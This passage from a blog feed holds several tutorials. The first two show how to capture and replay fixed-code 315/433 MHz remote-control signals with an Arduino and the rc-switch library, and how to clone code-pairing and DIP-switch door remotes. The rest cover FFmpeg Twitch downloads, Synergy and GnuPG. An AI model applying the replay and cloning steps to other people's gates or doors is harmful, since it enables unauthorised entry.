<p>Open the Serial Monitor from the menu bar via Tools > Serial Monitor, or press the shortcut <code>Ctrl + Shift + M</code>.</p>
<p>Now press a button on the remote control: the Arduino decodes the signal, and the Serial Monitor shows the code sent by the button you pressed.</p>
<p><img src="//files.iternull.com/images/2017-01-29_01-0005.png" alt=""></p>
<h2 id="2、重放信号"><a href="#2、重放信号" class="headerlink" title="2. Replaying the signal"></a>2. Replaying the signal</h2>
<p>Once you know the signal's code, you can replay it.</p>
<h3 id="2-1-连接-Arduino-和发送模块"><a href="#2-1-连接-Arduino-和发送模块" class="headerlink" title="2.1 Connecting the Arduino and the transmitter module"></a>2.1 Connecting the Arduino and the transmitter module</h3>
<p><img src="//files.iternull.com/images/2017-01-29_01-0006.png" alt=""></p>
<h3 id="2-2-修改示例代码"><a href="#2-2-修改示例代码" class="headerlink" title="2.2 Modifying the example code"></a>2.2 Modifying the example code</h3>
<p>Open the example sketch for sending signals, from the menu bar under File > Examples > rc-switch > SendDemo.</p>
<p>The example contains several sending methods and several commented-out transmit parameters.</p>
<p>Here we use the decimal sending method.</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">  Example for different sending methods</span></span><br><span class="line"><span class="comment">  </span></span><br><span class="line"><span class="comment">  https://github.com/sui77/rc-switch/</span></span><br><span class="line"><span class="comment">  </span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;RCSwitch.h&gt;</span></span></span><br><span class="line"></span><br><span class="line">RCSwitch mySwitch = RCSwitch();</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">setup</span><span class="params">()</span> </span>{</span><br><span class="line"></span><br><span class="line">  Serial.begin(<span class="number">9600</span>);</span><br><span class="line">  </span><br><span class="line">  <span class="comment">// Transmitter is connected to Arduino Pin #10</span></span><br><span class="line">  mySwitch.enableTransmit(<span class="number">10</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Optional set pulse length.</span></span><br><span class="line">  <span class="comment">// mySwitch.setPulseLength(320);</span></span><br><span class="line">  </span><br><span class="line">  <span class="comment">// Optional set protocol (default is 1, will work for most outlets)</span></span><br><span class="line">  <span class="comment">// mySwitch.setProtocol(2);</span></span><br><span class="line">  </span><br><span class="line">  <span class="comment">// Optional set number of transmission repetitions.</span></span><br><span class="line">  <span class="comment">// mySwitch.setRepeatTransmit(15);</span></span><br><span class="line">  </span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">loop</span><span class="params">()</span> </span>{</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* See Example: TypeA_WithDIPSwitches */</span></span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">  mySwitch.switchOn("11111", "00010");</span></span><br><span class="line"><span class="comment">  delay(1000);</span></span><br><span class="line"><span class="comment">  mySwitch.switchOff("11111", "00010");</span></span><br><span class="line"><span class="comment">  delay(1000);</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Same switch as above, but using decimal code */</span></span><br><span class="line">  mySwitch.send(<span class="number">5393</span>, <span class="number">24</span>); <span class="comment">// 5393 is the signal code to send, 24 is the data length in bits.</span></span><br><span class="line">  delay(<span class="number">1000</span>); <span class="comment">// Pause for 1000 milliseconds before running the next line.</span></span><br><span class="line">  mySwitch.send(<span class="number">5396</span>, <span class="number">24</span>);</span><br><span class="line">  delay(<span class="number">1000</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Same switch as above, but using binary code */</span></span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">  mySwitch.send("000000000001010100010001");</span></span><br><span class="line"><span class="comment">  delay(1000);</span></span><br><span class="line"><span class="comment">  mySwitch.send("000000000001010100010100");</span></span><br><span class="line"><span class="comment">  delay(1000);</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Same switch as above, but tri-state code */</span></span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">  mySwitch.sendTriState("00000FFF0F0F");</span></span><br><span class="line"><span class="comment">  delay(1000);</span></span><br><span class="line"><span class="comment">  mySwitch.sendTriState("00000FFF0FF0");</span></span><br><span class="line"><span class="comment">  delay(1000);</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line"></span><br><span class="line">  delay(<span class="number">20000</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h3 id="2-3-上传代码"><a href="#2-3-上传代码" class="headerlink" title="2.3 Uploading the code"></a>2.3 Uploading the code</h3>
<p><img src="//files.iternull.com/images/2017-01-29_01-0004.png" alt=""></p>
<p>Once the upload finishes, the Arduino keeps transmitting the signal.</p>
<h2 id="3、可能遇到的问题"><a href="#3、可能遇到的问题" class="headerlink" title="3. Problems you may run into"></a>3. Problems you may run into</h2>
<p>1. The Serial Monitor shows nothing and the signal is not received.</p>
<p>Many things can cause this, for example the wrong port being opened, the receiver module being wired to the Arduino incorrectly, or the remote control and the receiver module not being on the same frequency band.</p>
<p>2. The signal is transmitted normally but the controlled device does not respond.</p>
<p>In this case, receive and decode the signal with the RC Switch library's ReceiveDemo_Advanced example. Its output includes a <code>PulseLength</code> field. The RC Switch library's default value is <code>320</code>, while common remote controls use <code>185</code>, so you need to change the <code>mySwitch.setPulseLength(185);</code> parameter in the sending code.</p>
<hr><ul><li>RC Switch: <a href="https://github.com/sui77/rc-switch" target="_blank" rel="noopener">https://github.com/sui77/rc-switch</a></li></ul>]]></content>
<summary type="html">
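<p>To capture, analyze and replay remote-control signals we usually use SDR hardware. Common choices are the R820T2+RTL2832U, CC1111EMK, Yardstick One, HackRF One and so on.<br>The R820T2+RTL2832U TV dongle is the cheapest SDR device, available for about 35 RMB; the others are all fairly expensive. With the TV dongle, however, you can only receive signals, not transmit them.</p>
<p>Here we use even cheaper hardware (an Arduino plus a 315 or 433 MHz super-regenerative module) to analyze and replay the signals of common fixed-code remote controls.<br>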
</summary>
<category term="433 MHz" scheme="https://blog.iternull.com/tags/433-MHz/"/>
<category term="315 MHz" scheme="https://blog.iternull.com/tags/315-MHz/"/>
<category term="Arduino" scheme="https://blog.iternull.com/tags/Arduino/"/>
<category term="RC Switch" scheme="https://blog.iternull.com/tags/RC-Switch/"/>
</entry>
<entry>
<title>How to Copy Code-Pairing and DIP-Switch Remote Controls</title>
<link href="https://blog.iternull.com/posts/2017/01/11/Onthe-code-amd-dial-code-remote-control.html"/>
<id>https://blog.iternull.com/posts/2017/01/11/Onthe-code-amd-dial-code-remote-control.html</id>
<published>2017-01-11T07:05:18.000Z</published>
<updated>2017-02-11T05:59:54.032Z</updated>
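<content type="html"><![CDATA[<p>A code-pairing remote control is one that can automatically learn another remote on the same frequency band. A DIP-switch remote control has an 8-position, 3-state DIP switch, and you have to open the case to set the switch positions.<br><a id="more"></a></p>
<h2 id="对码遥控器拷贝方法"><a href="#对码遥控器拷贝方法" class="headerlink" title="Copying with a code-pairing remote control"></a>Copying with a code-pairing remote control</h2>
<p><img src="//files.iternull.com/images/2017-01-11_02-0001.jpg" alt=""></p>
<h3 id="清码"><a href="#清码" class="headerlink" title="Clearing the code"></a>Clearing the code</h3>
<p>Press the two buttons in the top row of the remote at the same time. Once the indicator LED is flashing continuously, release the buttons; the code has been cleared.<br>To confirm that clearing succeeded, press any one of the remote's four buttons: the LED flashes just once and then goes out.</p>
<h3 id="对拷"><a href="#对拷" class="headerlink" title="Copying"></a>Copying</h3>
<p>Hold the original remote in one hand and the copying remote in the other, keep the two as close together as possible, and press the door-open button on both at the same time.<br>When the copying remote's LED flashes rapidly, the copy has succeeded and you can release the buttons. Copy the other three buttons the same way, one at a time.<br>(If the LED does not flash during copying, change position, for example by pointing the heads of the two remotes at each other, and try again. In short, try several positions.)</p>
<h3 id="恢复"><a href="#恢复" class="headerlink" title="Restoring"></a>Restoring</h3>
<p>If you clear a code you still need by mistake (for example by accidentally pressing the two top buttons),<br>then as long as you have not yet copied another remote, you can press the two buttons in the bottom row at the same time; when the LED flashes rapidly, release them and the restore is complete.</p>
<h2 id="拨码遥控器拷贝方法"><a href="#拨码遥控器拷贝方法" class="headerlink" title="Copying with a DIP-switch remote control"></a>Copying with a DIP-switch remote control</h2>
<p><img src="//files.iternull.com/images/2017-01-11_02-0002.jpg" alt=""></p>
<h3 id="对应码表拨码"><a href="#对应码表拨码" class="headerlink" title="Setting the switches from the code table"></a>Setting the switches from the code table</h3>
<p><img src="//files.iternull.com/images/2017-01-11_02-0003.png" alt=""></p>
<h3 id="对应焊点拨码"><a href="#对应焊点拨码" class="headerlink" title="Setting the switches from the solder points"></a>Setting the switches from the solder points</h3>
<p><img src="//files.iternull.com/images/2017-01-11_02-0004.jpg" alt=""></p>
<p>If the remote has neither a DIP-switch table nor solder points, it is probably a learning-code remote; the controlled device usually has a learn button.<br>When matching a remote, also pay attention to the operating frequency band. The crystal on the board usually carries a number such as 433 or 315, which is the band the remote uses.<br>Remotes on different bands are not interchangeable. Another way to check is to transmit continuously with a remote of a known band and see whether it causes interference;<br>if it does, the two remotes are on the same band. This method does not always work.</p>
<hr><ul><li><a href="http://jingyan.baidu.com/article/6b97984db4c0961ca2b0bf15.html" target="_blank" rel="noopener">http://jingyan.baidu.com/article/6b97984db4c0961ca2b0bf15.html</a></li></ul>]]></content>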
<summary type="html">
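<p>A code-pairing remote control is one that can automatically learn another remote on the same frequency band. A DIP-switch remote control has an 8-position, 3-state DIP switch, and you have to open the case to set the switch positions.<br>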
</summary>
<category term="433 MHz" scheme="https://blog.iternull.com/tags/433-MHz/"/>
</entry>
<entry>
<title>Downloading Twitch Videos with FFmpeg</title>
<link href="https://blog.iternull.com/posts/2017/01/11/FFmpeg-Download-Twitch-Video.html"/>
<id>https://blog.iternull.com/posts/2017/01/11/FFmpeg-Download-Twitch-Video.html</id>
<published>2017-01-11T06:25:17.000Z</published>
<updated>2017-02-11T05:58:22.476Z</updated>
<content type="html"><![CDATA[<p>Twitch is a video site that uses streaming playback. I used to download its videos with Xunlei (Thunder) using another method, but the site seems to have been upgraded and that method no longer works.<br>This post describes how to download with FFmpeg.<br><a id="more"></a><br>With streaming playback, the player first fetches a file in M3U8 format. M3U8 is a file format for multimedia playlists: an M3U8 file gives the locations of one or more media files rather than containing the video itself.</p>
<p>Open the browser's debugging tools, also called developer tools; Chrome is used as the example here.</p>
<p>Press <code>F12</code> to open the developer tools, then open a Twitch <a href="https://www.twitch.tv/reddit/v/113771480" target="_blank" rel="noopener">video</a> page in the browser.</p>
<p>Click the Network tab of the developer tools and type <code>m3u8</code> into the filter box. You will see several files with the <code>.m3u8</code> suffix; if not, refresh the page.<br>The one we need is the <code>.m3u8</code> file named after the current video ID. Right-click that file and choose <code>Open link in new tab</code>; a new window opens and the file is downloaded directly.</p>
<p><img src="//files.iternull.com/images/2017-01-11_01-0001.png" alt=""></p>
<p>Opening the file shows content like the following:</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">#EXTM3U</span><br><span class="line">#EXT-X-TWITCH-INFO:ORIGIN="swift",CLUSTER="akamai_vod",REGION="AS",MANIFEST-CLUSTER="akamai_vod",USER-IP="*.*.*.*"</span><br><span class="line">#EXT-X-MEDIA:TYPE=VIDEO,GROUP-ID="chunked",NAME="Source",AUTOSELECT=YES,DEFAULT=YES</span><br><span class="line">#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=2224881,CODECS="avc1.64001F,mp4a.40.2",RESOLUTION="960x540",VIDEO="chunked"</span><br><span class="line">https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/chunked/index-dvr.m3u8</span><br><span class="line">#EXT-X-MEDIA:TYPE=VIDEO,GROUP-ID="high",NAME="High",AUTOSELECT=YES,DEFAULT=YES</span><br><span class="line">#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=1860187,CODECS="avc1.000000,mp4a.40.2",RESOLUTION="0x0",VIDEO="high"</span><br><span class="line">https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/high/index-dvr.m3u8</span><br><span class="line">#EXT-X-MEDIA:TYPE=VIDEO,GROUP-ID="medium",NAME="Medium",AUTOSELECT=YES,DEFAULT=YES</span><br><span class="line">#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=1042492,CODECS="avc1.000000,mp4a.40.2",RESOLUTION="0x0",VIDEO="medium"</span><br><span class="line">https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/medium/index-dvr.m3u8</span><br><span class="line">#EXT-X-MEDIA:TYPE=VIDEO,GROUP-ID="low",NAME="Low",AUTOSELECT=YES,DEFAULT=YES</span><br><span class="line">#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=733910,CODECS="avc1.000000,mp4a.40.2",RESOLUTION="0x0",VIDEO="low"</span><br><span class="line">https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/low/index-dvr.m3u8</span><br><span class="line">#EXT-X-MEDIA:TYPE=VIDEO,GROUP-ID="mobile",NAME="Mobile",AUTOSELECT=YES,DEFAULT=YES</span><br><span class="line">#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=324657,CODECS="avc1.000000,mp4a.40.2",RESOLUTION="0x0",VIDEO="mobile"</span><br><span class="line">https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/mobile/index-dvr.m3u8</span><br></pre></td></tr></table></figure>
<p>We normally use the <code>chunked</code> link.<br>Copy the link you chose and use FFmpeg to download and convert it.</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">./ffmpeg -i "https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/chunked/index-dvr.m3u8" -c copy -bsf:a aac_adtstoasc file_name.mkv</span><br></pre></td></tr></table></figure>
<p><code>file_name.mkv</code> is your output file name. If no error is reported, the whole video is downloaded.</p>]]></content>
<summary type="html">
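<p>Twitch is a video site that uses streaming playback. I used to download its videos with Xunlei (Thunder) using another method, but the site seems to have been upgraded and that method no longer works.<br>This post describes how to download with FFmpeg.<br>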
</summary>
<category term="FFmpeg" scheme="https://blog.iternull.com/tags/FFmpeg/"/>
<category term="Twitch" scheme="https://blog.iternull.com/tags/Twitch/"/>
</entry>
<entry>
<title>A Brief Introduction to Using Synergy</title>
<link href="https://blog.iternull.com/posts/2016/08/05/Synergy-Introduction.html"/>
<id>https://blog.iternull.com/posts/2016/08/05/Synergy-Introduction.html</id>
<published>2016-08-05T05:59:51.000Z</published>
<updated>2017-02-11T06:00:56.742Z</updated>
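<content type="html"><![CDATA[<p>Synergy is a tool that lets several computers share one keyboard and mouse, and it also supports a shared clipboard.<br>Synergy is cross-platform open-source software with paid and free versions; it supports Win/Mac/Linux and can noticeably improve productivity.<br><a id="more"></a></p>
<h2 id="1、下载"><a href="#1、下载" class="headerlink" title="1. Download"></a>1. Download</h2>
<p>Synergy used to be completely free. The vendor now recommends buying the paid version, but a free version is also available.<br>Synergy website: <a href="http://symless.com/synergy/" target="_blank" rel="noopener">http://symless.com/synergy/</a><br>Synergy free version download: <a href="http://symless.com/download/free/" target="_blank" rel="noopener">http://symless.com/download/free/</a></p>
<h2 id="2、配置"><a href="#2、配置" class="headerlink" title="2. Configuration"></a>2. Configuration</h2>
<p>Synergy needs 2 computers: the one with the keyboard and mouse to be shared plugged in acts as the server, and the other computers act as clients.</p>
<h3 id="服务端配置"><a href="#服务端配置" class="headerlink" title="Server configuration"></a>Server configuration</h3>
<p><img src="//files.iternull.com/images/2016-08-05_01-0001.png" alt=""></p>
<p>Select server mode, choose to configure the server settings yourself, and click <code>Configure Server</code> to bring up the server configuration window.</p>
<p><img src="//files.iternull.com/images/2016-08-05_01-0002.png" alt=""></p>
<p>By default the configuration window contains only the icon for the local machine; the other computers have to be added manually.</p>
<p>For example, if a Windows laptop sits to the right of this machine, drag the computer icon from the top-right corner to the right of the local machine's icon (place it according to the physical position of the displays, otherwise mouse movement will feel very awkward).</p>
<p>Double-click the newly added icon to open its settings window, enter the host name of the computer being added in the <code>Screen name</code> field (it must be identical to that machine's host name), and click <code>OK</code> to save and close.<br>To remove a client computer, drag its icon to the trash can in the top-left corner.<br>When all hosts have been added, click <code>OK</code> to save and close.</p>
<p>Save the configuration file locally<br>Click <code>Save configure</code> in the <code>File</code> menu to save it to a directory of your choice, or press the shortcut <code>Ctrl + Alt + S</code>.<br>Click <code>Start</code> in the bottom-right corner to start the Synergy service.</p>
<p><img src="//files.iternull.com/images/2016-08-05_01-0003.png" alt=""></p>
<p>The Synergy window can be closed; Synergy keeps running in the background. To exit Synergy, click <code>Quit</code> in the <code>File</code> menu.</p>
<h3 id="客户端配置"><a href="#客户端配置" class="headerlink" title="Client configuration"></a>Client configuration</h3>
<p><img src="//files.iternull.com/images/2016-08-05_01-0004.png" alt=""></p>
<p>Select client mode, enter the server's <code>IP</code> in the <code>Server IP</code> field, and click <code>Start</code> in the bottom-right corner to start the Synergy service and connect to the server.</p>
<h2 id="3、使用"><a href="#3、使用" class="headerlink" title="3. Usage"></a>3. Usage</h2>
<p>Once configuration is complete and no errors are reported, Synergy is ready to use.<br>Move the mouse past the right edge of this machine's screen and it moves onto the screen of the computer on the right; the keyboard switches over automatically as well.</p>
<p>Explore the remaining features on your own.</p>
<hr><ul><li>Synergy Wiki: <a href="https://github.com/symless/synergy/wiki" target="_blank" rel="noopener">https://github.com/symless/synergy/wiki</a></li></ul>]]></content>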
<summary type="html">
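<p>Synergy is a tool that lets several computers share one keyboard and mouse, and it also supports a shared clipboard.<br>Synergy is cross-platform open-source software with paid and free versions; it supports Win/Mac/Linux and can noticeably improve productivity.<br>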
</summary>
<category term="Synergy" scheme="https://blog.iternull.com/tags/Synergy/"/>
<category term="Keyborad" scheme="https://blog.iternull.com/tags/Keyborad/"/>
<category term="Mouse" scheme="https://blog.iternull.com/tags/Mouse/"/>
</entry>
<entry>
<title>GnuPG Getting Started Tutorial</title>
<link href="https://blog.iternull.com/posts/2016/07/16/GPG-Getting-Started-Tutorial.html"/>
<id>https://blog.iternull.com/posts/2016/07/16/GPG-Getting-Started-Tutorial.html</id>
<published>2016-07-16T02:26:33.000Z</published>
<updated>2017-06-09T21:03:13.757Z</updated>
<content type="html"><![CDATA[<p>GnuPG (GNU Privacy Guard,GPG) 是一种加密软件,它是 PGP 加密软件的满足 GPL 协议的替代物。GnuPG 依照由 IETF 制定的 OpenPGP 技术标准设计。GnuPG 是用于加密、数字签章及产生非对称匙对的软件。GPG 兼容 PGP (Pretty Good Privacy) 的功能。<br><a id="more"></a></p><h2 id="1、安装"><a href="#1、安装" class="headerlink" title="1、安装"></a>1、安装</h2><ul><li>Debian / Ubuntu</li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install gnupg</span><br></pre></td></tr></table></figure><ul><li>CentOS / Fedora</li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">yum install gnupg</span><br></pre></td></tr></table></figure><h2 id="2、第一次使用"><a href="#2、第一次使用" class="headerlink" title="2、第一次使用"></a>2、第一次使用</h2><p>首先你要有一对自己的密钥,才能开始使用。</p><h3 id="2-1、生成密钥对"><a href="#2-1、生成密钥对" class="headerlink" title="2.1、生成密钥对"></a>2.1、生成密钥对</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --gen-key</span><br></pre></td></tr></table></figure><p>回车以后,会跳出一大段文字:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span 
class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line">gpg (GnuPG) 1.4.12; Copyright (C) 2012 Free Software Foundation, Inc.</span><br><span class="line">This is free software: you are free to change and redistribute 
it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br><span class="line"></span><br><span class="line">gpg: directory `/home/zero/.gnupg<span class="string">' created</span></span><br><span class="line"><span class="string">gpg: new configuration file `/home/zero/.gnupg/gpg.conf'</span> created</span><br><span class="line">gpg: WARNING: options <span class="keyword">in</span> `/home/zero/.gnupg/gpg.conf<span class="string">' are not yet active during this run</span></span><br><span class="line"><span class="string">gpg: keyring `/home/zero/.gnupg/secring.gpg'</span> created</span><br><span class="line">gpg: keyring `/home/zero/.gnupg/pubring.gpg<span class="string">' created</span></span><br><span class="line"><span class="string">Please select what kind of key you want:</span></span><br><span class="line"><span class="string"> (1) RSA and RSA (default)</span></span><br><span class="line"><span class="string"> (2) DSA and Elgamal</span></span><br><span class="line"><span class="string"> (3) DSA (sign only)</span></span><br><span class="line"><span class="string"> (4) RSA (sign only)</span></span><br><span class="line"><span class="string">Your selection?// 选择加密算法,默认选择 (1) RSA 加密,直接回车</span></span><br><span class="line"><span class="string">RSA keys may be between 1024 and 4096 bits long.</span></span><br><span class="line"><span class="string">What keysize do you want? 
(2048)// 选择加密长度,默认 (2048)</span></span><br><span class="line"><span class="string">Requested keysize is 2048 bits</span></span><br><span class="line"><span class="string">Please specify how long the key should be valid.</span></span><br><span class="line"><span class="string"> 0 = key does not expire</span></span><br><span class="line"><span class="string"> <n> = key expires in n days</span></span><br><span class="line"><span class="string"> <n>w = key expires in n weeks</span></span><br><span class="line"><span class="string"> <n>m = key expires in n months</span></span><br><span class="line"><span class="string"> <n>y = key expires in n years</span></span><br><span class="line"><span class="string">Key is valid for? (0)// 密钥失效时间,默认为 (0) 永不失效</span></span><br><span class="line"><span class="string">Key does not expire at all</span></span><br><span class="line"><span class="string">Is this correct? (y/N) y// 确认上述配置正确</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">You need a user ID to identify your key; the software constructs the user ID</span></span><br><span class="line"><span class="string">from the Real Name, Comment and Email Address in this form:</span></span><br><span class="line"><span class="string"> "Heinrich Heine (Der Dichter) <[email protected]>"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Real name: Test User// 输入自己的真实名字</span></span><br><span class="line"><span class="string">Email address: [email protected]// 输入自己的邮箱</span></span><br><span class="line"><span class="string">Comment:// 补充内容</span></span><br><span class="line"><span class="string">You selected this USER-ID:</span></span><br><span class="line"><span class="string"> "Test User <[email protected]>"</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Change (N)ame, (C)omment, (E)mail or 
(O)kay/(Q)uit? o// 确认选项,可修改输入的内容,没问题输入 (O) 回车确认</span></span><br><span class="line"><span class="string">You need a Passphrase to protect your secret key.// 输入一个密码来保护私钥不被盗用</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">We need to generate a lot of random bytes. It is a good idea to perform</span></span><br><span class="line"><span class="string">some other action (type on the keyboard, move the mouse, utilize the</span></span><br><span class="line"><span class="string">disks) during the prime generation; this gives the random number</span></span><br><span class="line"><span class="string">generator a better chance to gain enough entropy.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Not enough random bytes available. Please do some other work to give</span></span><br><span class="line"><span class="string">the OS a chance to collect more entropy! (Need 201 more bytes)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">// 等待密钥生成,这时可以做一些其它事情(像是敲打键盘、移动鼠标、读写硬盘之类的),</span></span><br><span class="line"><span class="string">// 这会让随机数字发生器有更好的机会获得足够的熵数。</span></span><br><span class="line"><span class="string">// 建议另起一个终端,写一个耗性能的 for 循环脚本运行,否则要等很久。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">.........+++++</span></span><br><span class="line"><span class="string">.....+++++</span></span><br><span class="line"><span class="string">We need to generate a lot of random bytes. 
It is a good idea to perform</span></span><br><span class="line"><span class="string">some other action (type on the keyboard, move the mouse, utilize the</span></span><br><span class="line"><span class="string">disks) during the prime generation; this gives the random number</span></span><br><span class="line"><span class="string">generator a better chance to gain enough entropy.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Not enough random bytes available. Please do some other work to give</span></span><br><span class="line"><span class="string">the OS a chance to collect more entropy! (Need 84 more bytes)</span></span><br><span class="line"><span class="string">..+++++</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Not enough random bytes available. Please do some other work to give</span></span><br><span class="line"><span class="string">the OS a chance to collect more entropy! 
(Need 120 more bytes)</span></span><br><span class="line"><span class="string">.....+++++</span></span><br><span class="line"><span class="string">gpg: /home/zero/.gnupg/trustdb.gpg: trustdb created</span></span><br><span class="line"><span class="string">gpg: key 675394C8 marked as ultimately trusted</span></span><br><span class="line"><span class="string">public and secret key created and signed.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">gpg: checking the trustdb</span></span><br><span class="line"><span class="string">gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model</span></span><br><span class="line"><span class="string">gpg: depth: 0 valid: 1 signed: 0 trust: 0-, 0q, 0n, 0m, 0f, 1u</span></span><br><span class="line"><span class="string">pub 2048R/675394C8 2016-07-16</span></span><br><span class="line"><span class="string"> Key fingerprint = 86AB 2D80 CEED 59DC F046 F75C D027 CF07 6753 94C8</span></span><br><span class="line"><span class="string">uid Test User <test@example.com></span></span><br><span class="line"><span class="string">sub 2048R/D2951F3C 2016-07-16</span></span><br></pre></td></tr></table></figure></p><p>The key pair has now been generated; its ID is <code>675394C8</code>.</p><h3 id="2-2、管理密钥"><a href="#2-2、管理密钥" class="headerlink" title="2.2、管理密钥"></a>2.2 Managing keys</h3><p>List all keys on the system</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --list-keys</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span 
class="line">/home/zero/.gnupg/pubring.gpg</span><br><span class="line">-----------------------------</span><br><span class="line">pub 2048R/675394C8 2016-07-16</span><br><span class="line">uid Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 2048R/D2951F3C 2016-07-16</span><br><span class="line"></span><br><span class="line">pub 2048R/4D67E763 2016-07-16</span><br><span class="line">uid Test User2 <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 2048R/D2C6D99E 2016-07-16</span><br></pre></td></tr></table></figure><p>The first line shows the public keyring file name (~/.gnupg/pubring.gpg), and the second line shows the public key's characteristics (2048 bits, hash string and creation date).<br>The third line shows the user information, and the fourth line shows the private key's characteristics. If you hold more than one key, the others are listed below in the same way.</p><p>List all private keys on the system</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --list-secret-keys</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">/home/zero/.gnupg/secring.gpg</span><br><span class="line">-----------------------------</span><br><span class="line">sec 2048R/675394C8 2016-07-16</span><br><span class="line">uid Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">ssb 2048R/D2951F3C 2016-07-16</span><br></pre></td></tr></table></figure><p>List all public keys on the system</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --list-public-keys</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
